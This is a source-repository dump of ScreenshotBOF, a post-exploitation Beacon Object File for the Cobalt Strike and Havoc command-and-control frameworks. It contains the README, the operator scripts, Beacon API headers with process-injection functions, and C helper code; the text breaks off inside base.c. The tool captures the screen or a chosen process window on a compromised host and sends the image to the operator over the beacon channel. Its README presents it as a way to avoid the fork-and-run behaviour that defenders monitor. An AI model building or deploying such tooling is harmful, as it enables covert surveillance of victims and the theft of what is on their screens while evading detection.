├── .gitignore ├── ScreenshotBOF ├── ScreenshotBOF.x64.obj ├── ScreenshotBOF.x86.obj ├── screenshotBOF.py └── screenshotBOF.cna ├── common ├── anticrash.c ├── wmi.h ├── queue.c ├── stack.c ├── beacon.h ├── base.c ├── wmi.c └── bofdefs.h ├── Makefile ├── LICENSE ├── README.md ├── beacon.h ├── bofdefs.h └── entry.cpp /.gitignore: -------------------------------------------------------------------------------- 1 | /.vs 2 | /ScreenshotBOF/intermediary -------------------------------------------------------------------------------- /ScreenshotBOF/ScreenshotBOF.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodeXTF2/ScreenshotBOF/HEAD/ScreenshotBOF/ScreenshotBOF.x64.obj -------------------------------------------------------------------------------- /ScreenshotBOF/ScreenshotBOF.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodeXTF2/ScreenshotBOF/HEAD/ScreenshotBOF/ScreenshotBOF.x86.obj -------------------------------------------------------------------------------- /common/anticrash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bofdefs.h" 3 | //For some reason char *[] is invalid in BOF files 4 | //So this function stands to work around that problem 5 | 6 | //makes a char *[] since we can't seem to otherwise 7 | //count is the number of strings you're passing in will crash if this is wrong 8 | 9 | //Must call intFree on returned result 10 | char ** antiStringResolve(unsigned int count, ...) 11 | { 12 | va_list strings; 13 | va_start(strings, count); 14 | char ** result = intAlloc(sizeof(char *) * count); 15 | for(int i = 0; i < count; i++) 16 | { 17 | result[i] = (char *)va_arg(strings, char *); 18 | } 19 | va_end(strings); 20 | return result; 21 | } -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := ScreenshotBOF 2 | COMINCLUDE := -I .common 3 | LIBINCLUDE := 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | CC_x86 := i686-w64-mingw32-gcc 6 | CC=x86_64-w64-mingw32-clang 7 | 8 | all: 9 | $(CC_x64) -o $(BOFNAME).x64.obj $(COMINCLUDE) -Os -c entry.cpp -DBOF 10 | $(CC_x86) -o $(BOFNAME).x86.obj $(COMINCLUDE) -Os -c entry.cpp -DBOF 11 | mkdir -p $(BOFNAME) 12 | mv $(BOFNAME)*.obj $(BOFNAME) 13 | 14 | test: 15 | $(CC_x64) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x64.exe 16 | $(CC_x86) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x86.exe 17 | 18 | scanbuild: 19 | $(CC) entry.c -o $(BOFNAME).scanbuild.exe $(COMINCLUDE) $(LIBINCLUDE) 20 | 21 | check: 22 | cppcheck --enable=all $(COMINCLUDE) --platform=win64 entry.c 23 | 24 | clean: 25 | rm $(BOFNAME).*.exe -------------------------------------------------------------------------------- /common/wmi.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | 8 | 9 | 10 | 11 | typedef struct _Wmi { 12 | IWbemServices* pWbemServices; 13 | IWbemLocator* pWbemLocator; 14 | IEnumWbemClassObject* pEnumerator; 15 | BSTR bstrLanguage; 16 | BSTR bstrNameSpace; 17 | BSTR bstrNetworkResource; 18 | BSTR bstrQuery; 19 | } WMI; 20 | 21 | HRESULT Wmi_Initialize( 22 | WMI* pWMI 23 | ); 24 | 25 | HRESULT Wmi_Connect( 26 | WMI* pWmi, 27 | LPWSTR resource 28 | ); 29 | 30 | HRESULT Wmi_Query( 31 | WMI* pWmi, 32 | LPWSTR pwszQuery 33 | ); 34 | 35 | HRESULT Wmi_ParseResults( 36 | WMI* pWmi, 37 | LPWSTR pwszKeys, 38 | BSTR*** ppwszResults, 39 | LPDWORD pdwRowCount, 40 | LPDWORD pdwColumnCount 41 | ); 42 | 43 | void Wmi_Finalize( 44 | WMI* pWmi 45 | ); 46 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 CodeX 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /common/queue.c: -------------------------------------------------------------------------------- 1 | #include "bofdefs.h" 2 | //Not if anyone else adopts or looks at this 3 | //Its not threadsafe 4 | typedef struct _item{ 5 | void * elem; 6 | struct _item * next; 7 | }item, *Pitem; 8 | 9 | typedef struct _queue{\ 10 | Pitem head; 11 | Pitem tail; 12 | void (*push)(struct _queue *, void *); 13 | void * (*pop)(struct _queue *); 14 | void (*free)(struct _queue *); 15 | }queue, *Pqueue; 16 | 17 | void _push(Pqueue q, void * v) 18 | { 19 | Pitem i = (Pitem)intAlloc(sizeof(item)); 20 | i->elem = v; 21 | if(q->head == NULL && q->tail == NULL) // empty 22 | { 23 | q->head = i; 24 | q->tail = i; 25 | i->next = NULL; 26 | }else // not empty 27 | { 28 | q->tail->next = i; 29 | q->tail = i; 30 | } 31 | } 32 | void * _pop(Pqueue q) 33 | { 34 | void * retval = NULL; 35 | Pitem i = NULL; 36 | if(q->head == NULL && q->tail == NULL) // empty 37 | { 38 | return NULL; 39 | } 40 | retval = q->head->elem; //scanbuild false positive 41 | if(q->head == q->tail) //last elem 42 | { 43 | intFree(q->head); 44 | q->head = NULL; 45 | q->tail = NULL; 46 | } 47 | else // not the last item 48 | { 49 | i = q->head; 50 | q->head = q->head->next; 51 | intFree(i); 52 | } 53 | return retval; 54 | 55 | } 56 | 57 | void _free(Pqueue q) 58 | { 59 | intFree(q); 60 | } 61 | 62 | Pqueue queueInit() 63 | { 64 | Pqueue q = (Pqueue)intAlloc(sizeof(queue)); 65 | q->head = NULL; 66 | q->tail = NULL; 67 | q->push = _push; 68 | q->pop = _pop; 69 | q->free = _free; 70 | return q; 71 | } -------------------------------------------------------------------------------- /common/stack.c: -------------------------------------------------------------------------------- 1 | #include "bofdefs.h" 2 | //Note if anyone else adopts or looks at this 3 | //Its not threadsafe 4 | typedef struct _item{ 5 | void * elem; 6 | struct _item * next; 7 | struct _item * prev; 8 | }item, *Pitem; 9 | 10 | typedef struct _stack{\ 11 | Pitem head; 12 | Pitem tail; 13 | void (*push)(struct _stack *, void *); 14 | void * (*pop)(struct _stack *); 15 | void (*free)(struct _stack *); 16 | }stack, *Pstack; 17 | 18 | void _push(Pstack q, void * v) 19 | { 20 | Pitem i = (Pitem)intAlloc(sizeof(item)); 21 | i->elem = v; 22 | if(q->head == NULL && q->tail == NULL) // empty 23 | { 24 | q->head = i; 25 | q->tail = i; 26 | i->next = NULL; 27 | i->prev = NULL; 28 | }else // not empty 29 | { 30 | q->tail->next = i; 31 | i->prev = q->tail; 32 | q->tail = i; 33 | } 34 | } 35 | void * _pop(Pstack q) 36 | { 37 | void * retval = NULL; 38 | Pitem i = NULL; 39 | if(q->head == NULL && q->tail == NULL) // empty 40 | { 41 | return NULL; 42 | } 43 | retval = q->tail->elem; 44 | if(q->head == q->tail) //last elem 45 | { 46 | intFree(q->head); 47 | q->head = NULL; 48 | q->tail = NULL; 49 | } 50 | else // not the last item 51 | { 52 | i = q->tail; 53 | q->tail = i->prev; 54 | intFree(i); 55 | } 56 | return retval; 57 | 58 | } 59 | 60 | void _free(Pstack q) 61 | { 62 | intFree(q); 63 | } 64 | 65 | 66 | Pstack stackInit() 67 | { 68 | Pstack q = (Pstack)intAlloc(sizeof(stack)); 69 | q->head = NULL; 70 | q->tail = NULL; 71 | q->push = _push; 72 | q->pop = _pop; 73 | q->free = _free; 74 | return q; 75 | } -------------------------------------------------------------------------------- /ScreenshotBOF/screenshotBOF.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand 2 | 3 | def screenshot_bof( 4 | demonID, 5 | * param: tuple 6 | ): 7 | TaskID : str = None 8 | demon : Demon = None 9 | packer : Packer = Packer() 10 | 11 | demon = Demon( demonID ) 12 | BOF_ENTRY = "go" 13 | BOF_NAME = f"ScreenshotBOF.{demon.ProcessArch}.obj" 14 | 15 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to take screenshot (via ScreenshotBOF)" ) 16 | if len( param ) < 3: 17 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Invalid arguments provided" ) 18 | return False 19 | 20 | filename, save_method, pid = param 21 | match save_method: 22 | case "0" | "1": 23 | pass 24 | case "2": 25 | demon.ConsoleWrite(demon.CONSOLE_ERROR, "save method (2) not supported") 26 | return False 27 | case _: 28 | demon.ConsoleWrite(demon.CONSOLE_ERROR, "Invalid save_method provided") 29 | return False 30 | 31 | packer.addstr( filename ) 32 | packer.addint( int( save_method ) ) 33 | packer.addint( int( pid ) ) 34 | 35 | BOF_PARAMS = packer.getbuffer() 36 | demon.InlineExecute( 37 | TaskID, 38 | BOF_ENTRY, 39 | BOF_NAME, 40 | BOF_PARAMS, 41 | False 42 | ) 43 | 44 | return TaskID 45 | 46 | RegisterCommand( 47 | screenshot_bof, 48 | "", 49 | "screenshotBOF", 50 | "Take a screenshot of the screen and/or other processes", 51 | 0, 52 | " \n" 53 | "\n" 54 | "Arguments:\n" 55 | " filename Name of the file to save the screenshot as\n" 56 | " save_method 0 - Drop file to disk\n" 57 | " 1 - Download over beacon as a file\n" 58 | " 2 - Download over beacon as a screenshot\n" 59 | " PID Set to 0 for full screen capture, or provide a process ID\n", 60 | "screen.jpg 1 0" 61 | ); 62 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ScreenshotBOF 2 | 3 | An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory. 4 | 5 | # Features 6 | - JPEG compression 7 | - In memory download as screenshot or as file 8 | - Supports capturing of minimized windows 9 | - Grayscale, JPEG quality and Downscaling to reduce file size 10 | 11 | ## Self Compilation 12 | 1. git clone the repo 13 | 2. run `make` 14 | 15 | ## Save methods: 16 | 0. drop file to disk 17 | 1. download file over beacon (Cobalt Strike only) 18 | 2. download file over beacon as a screenshot (Cobalt Strike only) 19 | 20 | ## PID 21 | 0: capture full screen (PID = 0) 22 | specific PID: capture specific PID (works even when minimized!) 23 | 24 | ## Usage 25 | 1. import the screenshotBOF.cna script into Cobalt Strike 26 | 2. use the command screenshot_bof {local filename} {save method 0/1/2} {pid/0} {grayscale 0/1} {quality 0-100} {scale 0-100} 27 | - running `screenshot_bof` with no arguments will pop a GUI dialog 28 | 29 | ``` 30 | beacon> screenshot_bof file.jpg 2 21964 0 90 100 31 | [*] Running screenshot BOF by (@codex_tf2) 32 | [+] host called home, sent: 12421 bytes 33 | [+] received output: 34 | Downloading JPEG over beacon as a screenshot with filename file.jpg 35 | [*] received screenshot of Screenshot from Admin (26kb) 36 | [+] received output: 37 | Screenshot saved/downloaded successfully 38 | ``` 39 | 40 | 41 | ## Notes 42 | - no evasion is performed, which should be fine since the WinAPIs used are not malicious 43 | 44 | ## Why did I make this? 45 | Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability. 46 | 47 | ## Credits 48 | - Save BMP to file from https://stackoverflow.com/a/60667564 49 | - in memory download from https://github.com/anthemtotheego/CredBandit 50 | - @BinaryFaultline for (deprecated) BMP rendering in aggressorscript, and screenshot callback function 51 | - bitmap to jpeg from https://github.com/WKL-Sec/HiddenDesktop 52 | 53 | ## Disclaimer 54 | usual disclaimer here, I am not responsible for any crimes against humanity you may commit or nuclear war you may cause using this piece of poorly written code. 55 | -------------------------------------------------------------------------------- /common/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | #pragma once 12 | 13 | #ifdef BOF 14 | typedef struct { 15 | char * original; /* the original buffer [so we can free it] */ 16 | char * buffer; /* current pointer into our buffer */ 17 | int length; /* remaining length of data */ 18 | int size; /* total size of this buffer */ 19 | } datap; 20 | 21 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 22 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 23 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 24 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 25 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 26 | 27 | /* format API */ 28 | typedef struct { 29 | char * original; /* the original buffer [so we can free it] */ 30 | char * buffer; /* current pointer into our buffer */ 31 | int length; /* remaining length of data */ 32 | int size; /* total size of this buffer */ 33 | } formatp; 34 | 35 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 36 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 37 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 38 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 39 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 40 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 41 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 42 | 43 | /* Output Functions */ 44 | #define CALLBACK_OUTPUT 0x0 45 | #define CALLBACK_OUTPUT_OEM 0x1e 46 | #define CALLBACK_ERROR 0x0d 47 | #define CALLBACK_OUTPUT_UTF8 0x20 48 | 49 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 50 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 51 | 52 | /* Token Functions */ 53 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 54 | DECLSPEC_IMPORT void BeaconRevertToken(); 55 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 56 | 57 | /* Spawn+Inject Functions */ 58 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 59 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 60 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 61 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 62 | 63 | /* Utility Functions */ 64 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 65 | #endif 66 | -------------------------------------------------------------------------------- /beacon.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | /* 4 | * Beacon Object Files (BOF) 5 | * ------------------------- 6 | * A Beacon Object File is a light-weight post exploitation tool that runs 7 | * with Beacon's inline-execute command. 8 | * 9 | * Cobalt Strike 4.1. 10 | */ 11 | 12 | /* data API */ 13 | typedef struct { 14 | char * original; /* the original buffer [so we can free it] */ 15 | char * buffer; /* current pointer into our buffer */ 16 | int length; /* remaining length of data */ 17 | int size; /* total size of this buffer */ 18 | } datap; 19 | 20 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 21 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 22 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 23 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 24 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 25 | 26 | /* format API */ 27 | typedef struct { 28 | char * original; /* the original buffer [so we can free it] */ 29 | char * buffer; /* current pointer into our buffer */ 30 | int length; /* remaining length of data */ 31 | int size; /* total size of this buffer */ 32 | } formatp; 33 | 34 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 35 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 36 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 37 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 38 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 39 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 40 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 41 | 42 | /* Output Functions */ 43 | #define CALLBACK_OUTPUT 0x0 44 | #define CALLBACK_OUTPUT_OEM 0x1e 45 | #define CALLBACK_ERROR 0x0d 46 | #define CALLBACK_OUTPUT_UTF8 0x20 47 | #define CALLBACK_FILE 0x02 48 | #define CALLBACK_FILE_WRITE 0x08 49 | #define CALLBACK_FILE_CLOSE 0x09 50 | #define CALLBACK_SCREENSHOT 0x03 51 | 52 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 53 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 54 | 55 | /* Token Functions */ 56 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 57 | DECLSPEC_IMPORT void BeaconRevertToken(); 58 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 59 | 60 | /* Spawn+Inject Functions */ 61 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 62 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 63 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 64 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 65 | 66 | /* Utility Functions */ 67 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 68 | -------------------------------------------------------------------------------- /ScreenshotBOF/screenshotBOF.cna: -------------------------------------------------------------------------------- 1 | # Register command 2 | beacon_command_register( 3 | "screenshot_bof", 4 | "Alternative screenshot capability that does not do fork n run", 5 | "Use: screenshot_bof [filename] [save method] [PID] [grayscale(0/1)=0] [quality 0-100=90] [scale%=100]\n- PID 0 captures full screen\n- Save methods: 0 drop to disk, 1 download file, 2 download screenshot\n- Grayscale/quality/scale optional; defaults applied when omitted\n- Scale is percent of original (e.g., 50 = half size)\n\nTake a screenshot inline using a BOF. Screenshot is saved as JPEG on disk or downloaded over beacon." 6 | ); 7 | 8 | sub execute_screenshot { 9 | local('$bid $filename $method $pid $grayscale $quality $scale $handle $data $args $barch'); 10 | ($bid, $filename, $method, $pid, $grayscale, $quality, $scale) = @_; 11 | 12 | if ($bid is $null) { 13 | show_message("Error: No Beacon ID found. Please run this command from a Beacon console."); 14 | return; 15 | } 16 | 17 | $barch = barch($bid); 18 | 19 | # read in the right BOF file 20 | $handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj")); 21 | if (isnull($handle)) { 22 | berror($bid, "Error: Could not find ScreenshotBOF. $+ $barch $+ .obj in script resource path."); 23 | return; 24 | } 25 | $data = readb($handle, -1); 26 | closef($handle); 27 | 28 | $args = bof_pack($bid, "ziiiii", $filename, int($method), int($pid), int($grayscale), int($quality), int($scale)); 29 | 30 | btask($bid, "Running screenshot BOF by (@codex_tf2)", "T1113"); 31 | beacon_inline_execute($bid, $data, "go", $args); 32 | } 33 | 34 | alias screenshot_bof { 35 | local('$bid'); 36 | $bid = $1; 37 | 38 | # CASE 1: Arguments provided (CLI Mode) 39 | if (size(@_) > 1) { 40 | if (size(@_) < 4 || size(@_) > 7) { 41 | berror($bid, "Syntax: screenshot_bof [filename] [save method 0/1/2] [PID] [grayscale(0/1)=0] [quality 0-100=90] [scale%=100]"); 42 | return; 43 | } 44 | local('$filename $method $pid $grayscale $quality $scale'); 45 | $filename = $2; 46 | $method = $3; 47 | $pid = $4; 48 | $grayscale = iff(size(@_) >= 5, $5, 0); 49 | $quality = iff(size(@_) >= 6, $6, 90); 50 | $scale = iff(size(@_) >= 7, $7, 100); 51 | 52 | execute_screenshot($bid, $filename, $method, $pid, $grayscale, $quality, $scale); 53 | } 54 | # CASE 2: No arguments provided (GUI Mode) 55 | else { 56 | if ($bid is $null) { 57 | show_message("Error: You must run this command from inside a Beacon's console."); 58 | return; 59 | } 60 | 61 | local('$dialog %defaults'); 62 | 63 | # Define the human-readable options 64 | # I added the numbers in parens so you know what they map to if you switch back to CLI 65 | local('@options'); 66 | @options = @("Write to disk (0)", "Download as file (1)", "Download as screenshot (2)"); 67 | 68 | %defaults["filename"] = "image.jpeg"; 69 | %defaults["method"] = "Download as screenshot (2)"; # Set default text 70 | %defaults["pid"] = "0"; 71 | %defaults["grayscale"] = "false"; 72 | %defaults["quality"] = "90"; 73 | %defaults["scale"] = "100"; 74 | %defaults["_bid"] = $bid; 75 | 76 | $dialog = dialog("Screenshot BOF Config", %defaults, lambda({ 77 | local('$filename $method_str $method_int $pid $grayscale $quality $scale $target_bid'); 78 | 79 | $target_bid = $3["_bid"]; 80 | $filename = $3["filename"]; 81 | $method_str = $3["method"]; 82 | $pid = $3["pid"]; 83 | $quality = $3["quality"]; 84 | $scale = $3["scale"]; 85 | $grayscale = iff($3["grayscale"] eq "true", 1, 0); 86 | 87 | # Map the text selection back to the integer the BOF needs 88 | if ($method_str eq "Write to disk (0)") { 89 | $method_int = 0; 90 | } 91 | else if ($method_str eq "Download as file (1)") { 92 | $method_int = 1; 93 | } 94 | else { 95 | $method_int = 2; # Default to screenshot view 96 | } 97 | 98 | execute_screenshot($target_bid, $filename, $method_int, $pid, $grayscale, $quality, $scale); 99 | })); 100 | 101 | dialog_description($dialog, "Configure the screenshot parameters. Leave PID as 0 for full screen."); 102 | 103 | drow_text($dialog, "filename", "Filename:"); 104 | drow_combobox($dialog, "method", "Save Method:", @options); 105 | drow_text($dialog, "pid", "PID (0=Full Screen):"); 106 | drow_checkbox($dialog, "grayscale", "Grayscale"); 107 | drow_text($dialog, "quality", "Quality (0-100):"); 108 | drow_text($dialog, "scale", "Scale %:"); 109 | 110 | dbutton_action($dialog, "Execute"); 111 | dialog_show($dialog); 112 | } 113 | } -------------------------------------------------------------------------------- /common/base.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bofdefs.h" 3 | #include "beacon.h" 4 | #ifndef bufsize 5 | #define bufsize 8192 6 | #endif 7 | 8 | 9 | 10 | 11 | char * output __attribute__((section (".data"))) = 0; // this is just done so its we don't go into .bss which isn't handled properly 12 | WORD currentoutsize __attribute__((section (".data"))) = 0; 13 | HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error 14 | 15 | #ifdef BOF 16 | int bofstart(); 17 | void internal_printf(const char* format, ...); 18 | void printoutput(BOOL done); 19 | #endif 20 | char * Utf16ToUtf8(const wchar_t* input); 21 | #ifdef BOF 22 | int bofstart() 23 | { 24 | output = (char*)MSVCRT$calloc(bufsize, 1); 25 | currentoutsize = 0; 26 | return 1; 27 | } 28 | 29 | void internal_printf(const char* format, ...){ 30 | int buffersize = 0; 31 | int transfersize = 0; 32 | char * curloc = NULL; 33 | char* intBuffer = NULL; 34 | va_list args; 35 | va_start(args, format); 36 | buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null 37 | va_end(args); 38 | 39 | // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string) 40 | if (buffersize == -1) 41 | return; 42 | 43 | char* transferBuffer = (char*)intAlloc(bufsize); 44 | intBuffer = (char*)intAlloc(buffersize); 45 | /*Print string to memory buffer*/ 46 | va_start(args, format); 47 | MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string 48 | va_end(args); 49 | if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end 50 | { 51 | //BeaconFormatPrintf(&output, intBuffer); 52 | memcpy(output+currentoutsize, intBuffer, buffersize); 53 | currentoutsize += buffersize; 54 | } 55 | else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print 56 | { 57 | curloc = intBuffer; 58 | while(buffersize > 0) 59 | { 60 | transfersize = bufsize - currentoutsize; // what is the max we could transfer this request 61 | if(buffersize < transfersize) //if I have less then that, lets just transfer what's left 62 | { 63 | transfersize = buffersize; 64 | } 65 | memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer 66 | currentoutsize += transfersize; 67 | //BeaconFormatPrintf(&output, transferBuffer); // copy it to cobalt strikes output buffer 68 | if(currentoutsize == bufsize) 69 | { 70 | printoutput(FALSE); // sets currentoutsize to 0 and prints 71 | } 72 | memset(transferBuffer, 0, transfersize); // reset our transfer buffer 73 | curloc += transfersize; // increment by how much data we just wrote 74 | buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall 75 | } 76 | } 77 | intFree(intBuffer); 78 | intFree(transferBuffer); 79 | } 80 | 81 | void printoutput(BOOL done) 82 | { 83 | 84 | char * msg = NULL; 85 | BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize); 86 | currentoutsize = 0; 87 | memset(output, 0, bufsize); 88 | if(done) {MSVCRT$free(output); output=NULL;} 89 | } 90 | #else 91 | #define internal_printf printf 92 | #define printoutput 93 | #define bofstart 94 | #endif 95 | 96 | // Changes to address issue #65. 97 | // We can't use more dynamic resolve functions in this file, which means a call to HeapRealloc is unacceptable. 98 | // To that end if you're going to use this function, declare how many libraries you'll be loading out of, multiple functions out of 1 library count as one 99 | // Normallize your library name to uppercase, yes I could do it, yes I'm also lazy and putting that on the developer. 100 | // Finally I'm going to assume actual string constants are passed in, which is to say don't pass in something to this you plan to free yourself 101 | // If you must then free it after bofstop is called 102 | #ifdef DYNAMIC_LIB_COUNT 103 | 104 | 105 | typedef struct loadedLibrary { 106 | HMODULE hMod; // mod handle 107 | const char * name; // name normalized to uppercase 108 | }loadedLibrary, *ploadedLibrary; 109 | loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0}; 110 | DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0; 111 | 112 | BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget) 113 | { 114 | BOOL bmatch = FALSE; 115 | DWORD pos = 0; 116 | while(szLibrary[pos] && sztarget[pos]) 117 | { 118 | if(szLibrary[pos] != sztarget[pos]) 119 | { 120 | goto end; 121 | } 122 | pos++; 123 | } 124 | if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match 125 | {goto end;} 126 | bmatch = TRUE; 127 | 128 | end: 129 | return bmatch; 130 | } 131 | 132 | //GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are gimmie functions 133 | // 134 | // DynamicLoad 135 | // Retrieves a function pointer given the BOF library-function name 136 | // szLibrary - The library containing the function you want to load 137 | // szFunction - The Function that you want to load 138 | // Returns a FARPROC function pointer if successful, or NULL if lookup fails 139 | // 140 | FARPROC DynamicLoad(const char * szLibrary, const char * szFunction) 141 | { 142 | FARPROC fp = NULL; 143 | HMODULE hMod = NULL; 144 | DWORD i = 0; 145 | DWORD liblen = 0; 146 | for(i = 0; i < loadedLibrariesCount; i++) 147 | { 148 | if(intstrcmp(szLibrary, loadedLibraries[i].name)) 149 | { 150 | hMod = loadedLibraries[i].hMod; 151 | } 152 | } 153 | if(!hMod) 154 | { 155 | hMod = LoadLibraryA(szLibrary); 156 | if(!hMod){ 157 | BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary); 158 | return NULL; 159 | } 160 | loadedLibraries[loadedLibrariesCount].hMod = hMod; 161 | loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop 162 | loadedLibrariesCount++; 163 | } 164 | fp = GetProcAddress(hMod, szFunction); 165 | 166 | if (NULL == fp) 167 | { 168 | BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction); 169 | } 170 | return fp; 171 | } 172 | #endif 173 | 174 | 175 | char* Utf16ToUtf8(const wchar_t* input) 176 | { 177 | int ret = Kernel32$WideCharToMultiByte( 178 | CP_UTF8, 179 | 0, 180 | input, 181 | -1, 182 | NULL, 183 | 0, 184 | NULL, 185 | NULL 186 | ); 187 | 188 | char* newString = (char*)intAlloc(sizeof(char) * ret); 189 | 190 | ret = Kernel32$WideCharToMultiByte( 191 | CP_UTF8, 192 | 0, 193 | input, 194 | -1, 195 | newString, 196 | sizeof(char) * ret, 197 | NULL, 198 | NULL 199 | ); 200 | 201 | if (0 == ret) 202 | { 203 | goto fail; 204 | } 205 | 206 | retloc: 207 | return newString; 208 | /*location to free everything centrally*/ 209 | fail: 210 | if (newString){ 211 | intFree(newString); 212 | newString = NULL; 213 | }; 214 | goto retloc; 215 | } 216 | 217 | //release any global functions here 218 | void bofstop() 219 | { 220 | #ifdef 